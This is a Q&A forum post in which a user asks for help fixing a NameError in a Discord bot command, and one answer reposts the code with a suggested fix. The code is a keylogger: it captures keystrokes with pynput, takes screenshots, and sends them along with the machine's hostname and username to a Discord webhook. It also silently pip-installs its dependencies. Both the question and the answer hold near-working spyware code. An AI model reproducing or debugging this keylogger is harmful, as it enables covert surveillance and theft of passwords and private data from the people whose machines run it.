# pypnut name 'keys' is not defined pypnut

Tags: python, import, nameerror

my code

```
@client.tree.command(name="keytest")
@app_commands.describe(nomkey = "10/100/1000")
async def keylogs(ctx, nomkey: str): 
  import os
  import socket
  from pynput.keyboard import Key, Listener
  try:
    from discord_webhook import DiscordWebhook, DiscordEmbed
  except:
    os.system("pip install discord-webhook")
    from discord_webhook import DiscordWebhook, DiscordEmbed
  try:
    import pyautogui
  except:
    os.system('pip install pyautogui')
    import pyautogui
  content = ""
  username = os.getlogin()
  test = socket.gethostname()
  n = os.linesep

  fpaa = rf"C:\Users\{username}\Downloads\0.jpg"

  content = ""
  webhook = DiscordWebhook(url=f"wehooks", username="test", avatar_url="https://i.ibb.co/PCP5tLh/kisspng-security-hacker-white-hat-anonymous-logo-products-and-services-data-solver-5c4f1b3b8218f9-95.png", content=content)
  embed = DiscordEmbed(title=f"**All In One**",  color=242424)
  webhook.add_embed(embed)

  embed.set_description(f"test your key {n}PC = '{test}'{n}OS = '{username}'")
  embed.set_author(name=f"{test}", url=f"https://www.youtube.com/@Kawaii_iKi_san/videos", icon_url="https://i.ibb.co/PCP5tLh/kisspng-security-hacker-white-hat-anonymous-logo-products-and-services-data-solver-5c4f1b3b8218f9-95.png")
  embed.set_footer(text=f"All In One - Discord Tools Program")
  embed.set_timestamp()
  response = webhook.execute()

  count = 0
  keys = []
  def on_press(key):
    global keys, count

    keys.append(key)
    count += 1
    if count >= {nomkey}:
        for key in keys:
            k = str(keys).replace("'", " ")
            hostname = socket.gethostname()
            IPAddr = socket.gethostbyname(hostname)
        count = 0
        embed.set_description(f"*{test}*{n}{n}{k}")
        embed.set_author(name=f"{test}", url=f"https://www.youtube.com/@Kawaii_iKi_san/videos", icon_url="https://i.ibb.co/PCP5tLh/kisspng-security-hacker-white-hat-anonymous-logo-products-and-services-data-solver-5c4f1b3b8218f9-95.png")
        embed.set_footer(text=f"All In One - Discord Tools Program")
        embed.set_timestamp()
        myScreenshot = pyautogui.screenshot()
        myScreenshot.save(f'{fpaa}')
        with open(f"{fpaa}", "rb") as f:
            webhook.add_file(file=f.read(), filename='0.jpg')
            embed.set_image(url='attachment://0.jpg')
        os.remove(fpaa)
        response = webhook.execute()
        keys = []

  def on_release(key):
    pass

  with Listener(on_press=on_press, on_release=on_release) as Listener:
    Listener.join()
```

my error

Traceback (most recent call last):
File "C:\Python310\lib\site-packages\discord\app_commands\commands.py", line 842, in *do_call
return await self.*callback(interaction, **params)  # type: ignore
File "f:\tout les dossier\discord tools\All In One\1FLG.pyw", line 751, in keylogs
Listener.join()
File "C:\Python310\lib\site-packages\pynput_util_*init**.py", line 276, in join
six.reraise(exc_type, exc_value, exc_traceback)
File "C:\Python310\lib\site-packages\six.py", line 718, in reraise
File "C:\Python310\lib\site-packages\pynput_util_*init**.py", line 228, in inner
return f(self, *args, **kwargs)
File "C:\Python310\lib\site-packages\pynput\keyboard_win32.py", line 287, in *process
self.on_press(key)
File "C:\Python310\lib\site-packages\pynput_util_*init**.py", line 144, in inner
if f(*args) is False:
File "f:\tout les dossier\discord tools\All In One\1FLG.pyw", line 726, in on_press
keys.append(key)
NameError: name 'keys' is not defined

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
File "C:\Python310\lib\site-packages\discord\app_commands\tree.py", line 1248, in _call
await command._invoke_with_namespace(interaction, namespace)
File "C:\Python310\lib\site-packages\discord\app_commands\commands.py", line 867, in _invoke_with_namespace
return await self._do_call(interaction, transformed_values)
File "C:\Python310\lib\site-packages\discord\app_commands\commands.py", line 860, in _do_call
raise CommandInvokeError(self, e) from e
discord.app_commands.errors.CommandInvokeError: Command 'keytest' raised an exception: NameError: name 'keys' is not defined

Please guys help me I can't understand why when keys is undefined and I made a global so that keys is defined in on_press(key) it always returns me this error I tried with chatGPT with the other people who had my error but I didn't find any solution please help me

Comment: Your question looks ok

Answer (score 0):

It looks like there's a `NameError` being raised because the keys list variable is not defined in the `on_press` function. The keys list is actually defined in the `main` function, but it needs to be made global within the `on_press` function in order to access and modify it.

You can make keys global by adding the following line at the beginning of the `on_press` function:

```
global keys

def on_press(key):
    global keys, count

    keys.append(key)
    count += 1
    if count >= {nomkey}:
        for key in keys:
            k = str(keys).replace("'", " ")
            hostname = socket.gethostname()
            IPAddr = socket.gethostbyname(hostname)
        count = 0
        embed.set_description(f"*{test}*{n}{n}{k}")
        embed.set_author(name=f"{test}", url=f"https://www.youtube.com/@Kawaii_iKi_san/videos", icon_url="https://i.ibb.co/PCP5tLh/kisspng-security-hacker-white-hat-anonymous-logo-products-and-services-data-solver-5c4f1b3b8218f9-95.png")
        embed.set_footer(text=f"All In One - Discord Tools Program")
        embed.set_timestamp()
        myScreenshot = pyautogui.screenshot()
        myScreenshot.save(f'{fpaa}')
        with open(f"{fpaa}", "rb") as f:
            webhook.add_file(file=f.read(), filename='0.jpg')
            embed.set_image(url='attachment://0.jpg')
        os.remove(fpaa)
        response = webhook.execute()
        keys = []
```

Comment: In the idea it could work even it should but it would mean that the message is never sent to the Webhooks discord because we redefine the value of keys to zero each time we press a key

in addition to the fact that you will also have to set the value of count because the error is made with both and since the message is sent to the webhooks only if count is lower than the value "nomkey" the message will simply never be sent and in the case that it will be sent it will be empty

Translated with www.DeepL.com/Translator (free version)